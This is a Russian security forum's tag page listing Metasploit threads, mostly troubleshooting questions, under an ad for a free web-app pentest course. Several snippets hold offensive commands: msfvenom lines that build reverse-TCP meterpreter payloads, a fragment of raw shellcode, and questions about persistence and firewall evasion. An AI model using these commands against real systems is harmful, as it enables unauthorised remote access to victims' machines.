• 🔥 Бесплатный курс от Академии Кодебай: «Анализ защищенности веб-приложений»

    🛡 Научитесь находить и использовать уязвимости веб-приложений.
    🧠 Изучите SQLi, XSS, CSRF, IDOR и другие типовые атаки на практике.
    🧪 Погрузитесь в реальные лаборатории и взломайте свой первый сайт!
    🚀 Подходит новичкам — никаких сложных предварительных знаний не требуется.

    Доступ открыт прямо сейчас Записаться бесплатно

metasploit

  1. W

    Metasploit не может подключиться к базам!

    Всем привет! Ошибка : "Failed to connect to the database: could not connect to server: Connection refused Is the server running on host "localhost" (::1) and accepting TCP/IP connections on port 5432? could not connect to server: Connection refused Is the server running on host...
  2. E

    Проблема metasploit

    Всем привет! Помогайте,заманался уже... ) Использую хендлер,ловлю сессию,делаю выход и после начинаются траблы ( Порт вечно занят,освободить невозможно. Даже когда он вроде бы как свободен при конфигурировании выдаёт ошибку Handler failed to bind to 111.111.111.6:9999 [-] Handler failed to...
  3. trueflownature

    Metasploit: не прошел проверку подлинности (по паролю)

    Как решить? Failed to connect to the database: ВАЖНО: пользователь "msf" не прошёл проверку подлинности (по паролю) ВАЖНО: пользователь "msf" не прошёл проверку подлинности (по паролю)
  4. BadBlackHat

    Статья Шпаргалка MSF

    Всем добрый день. Наткнулся тут на неплохую шпаргалку по использованию metasploit. Новичкам может пригодится)
  5. E

    Проблема MS14-066

    Все привет! Довольно часто встречаю узявимость MS14-066: Vulnerability in Schannel Could Allow Remote Code Execution. Что то не могу найти в метасплоите похожего модуля,да и в принципе везде только описание его действий,PoC нету. Есть у кого нибудь информация,как его эксплуатировать ? :)
  6. Rollly

    Статья Установка Ubuntu в связке с Metasploit [TERMUX]

    Доброго времени суток, обитатели Codeby. Думаю не у каждого есть возможность иметь при себе ноутбук с хакерским арсеналом или же NetHunter, но на помощь к нам приходит Termux. Не буду тянуть кота за хвост. Как вы поняли из названия темы сегодня мы установим Ubuntu в связке с Metasploit...
  7. linked3234

    "Адекватный" VPS для тестирования MSF

    Приветствую! Решил сюда написать, т.к. вроде тема соответствует разделу.. В общем я подыскиваю недорогой VPS на debian для тренировки с MSFConsole (что б сессия прилетала, думаю вы поняли).. Не подскажете кто шарит, что и где лучше взять?
  8. Tayrus

    Проблема ms17_010_psexec

    Обновился до 2018.1, решил тестануть ms17_010_psexec, пишет Started reverse TCP handler on 192.168.1.4:4444 192.168.1.2:445 - Target OS: Windows 8.1 Enterprise 9600 [-] 192.168.1.2:445 - Unable to find accessible named pipe! Exploit completed, but no session was created. Не патчена, антивиря...
  9. MLNK

    Статья Уроки по Burp Suite Pro Часть 1.1. Лаборатория

    You must be registered for see element. Эта статья является дополнением к You must be registered for see element. Всем ку! Мне поступило несколько просьб описать создание лаборатории и дабы это всё упростить я решил сделать это в доп статье. На скорость выхода второй части это никак не...
  10. Marr

    Metasploit Penetration Testing Cookbook

    Добрый день! Если у кого есть скиньте, пожалуйста, ссылку на полный перевод Metasploit Penetration Testing Cookbook Спасибо!
  11. S

    Ошибка metasploit wmap

    Ошибку ниже я сначала словил под Arch. Потом попробовал запустить и под Kali последней версии. Но ничего не поменялось под обеими ОС одна и та же ошибка. msf5 > wmap_targets -t http://site.com [-] Error while running command wmap_targets: PG::InvalidTextRepresentation: ERROR: invalid input...
  12. Tayrus

    Metasploit raw

    msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.4 lport=4444 -f raw > sag При открытии \FC\E8\82\00\00\00`\89\E51\C0d\8BP0\8BR\8BR\8Br(\B7J&1\FF\AC<a|, \C1\CF\C7\E2\F2RW\8BR\8BJ<\8BLx\E3H\D1Q\8BY...
  13. FlowLight

    Empire powershell и ngrok ! Кто-нибудь использует эту связку?

    Друзья , прошу помощи ! Не получается схватить агента с целевого пк , который находится за NATом. Слушатель Empire использует http-захват , а это поставило меня в тупик. Привык работать с TCP-ревёрсингом в метасплоит , использую NGROK для проброса портов. А вот в Empire не хватает тямы всё...
  14. BadBlackHat

    Архивная Пост эксплуатация скомпроментированных Windows систем. Metasploit Incognito

    Актуальная версия на 2025 год: You must be registered for see element. Всем посетителям форума, доброго времени дня. Сегодня я решил осветить один из встроенных модулей в metasploit framework, о котором мало кто знает и мало кто пользуется, но на самом деле данный модуль позволяет поднять свои...
  15. FlowLight

    Эксплоиты на С++

    Друзья! Скажите пожалуйста , каким образом можно использовать эксплоиты с данным раширением в Metasploit и в какой среде ,помимо метасплоит , можно их юзать?
  16. F

    Так много exploit'ов

    Всем здравствуйте. Совсем недавно начал углубленно изучать\читать про эксплоиты. Ведь именно они залог удачного взлома! И хотелось бы, так сказать, узнать о них еще больше. Недавно поставил на свою виртуальную машину windows7, и попробовал получить к ней доступ с помощью эксплоита eternalblue...
  17. Sykes

    Не работают эксплойты

    Основа: Кали или Арч Цель: машина на Windows XP, Windows 7, Windows server. Столкнулся с проблемой, что эксплойты не всегда создают ссесию, хотя система девственна и без намека на АВ. Проблема решается отключением брендмаузера, но как его обойти? Раньше таких проблем не испытывал.
  18. Tayrus

    Metasploit Автозагрузка

    Как в метасплоите закрепиться в системе(свой вредонос в автозагрузку занести)? Может модуль есть какой-нибудь?
  19. Tayrus

    Metasploit русский язык

    Когда в метасплоите пытаюсь взаимодействовать с файлами на русском языке, вылетает ошибка, мол нету такого файла, как пофиксить?
  20. Tayrus

    Metasploit ошибка

    У меня шиндовс 8.1, создаю shell такой командой: msfvenom -p windows/meterpreter/reverse_tcp LHOST=ВашАйпи LPORT=4444 -f exe > /root/shell.exe Закидываю на хост, сессия прилетает, такие команды типо cd pwd ifconfig работают, а все остальные нет, не работает даже cat пишет: [-] stdapi_fs_stat...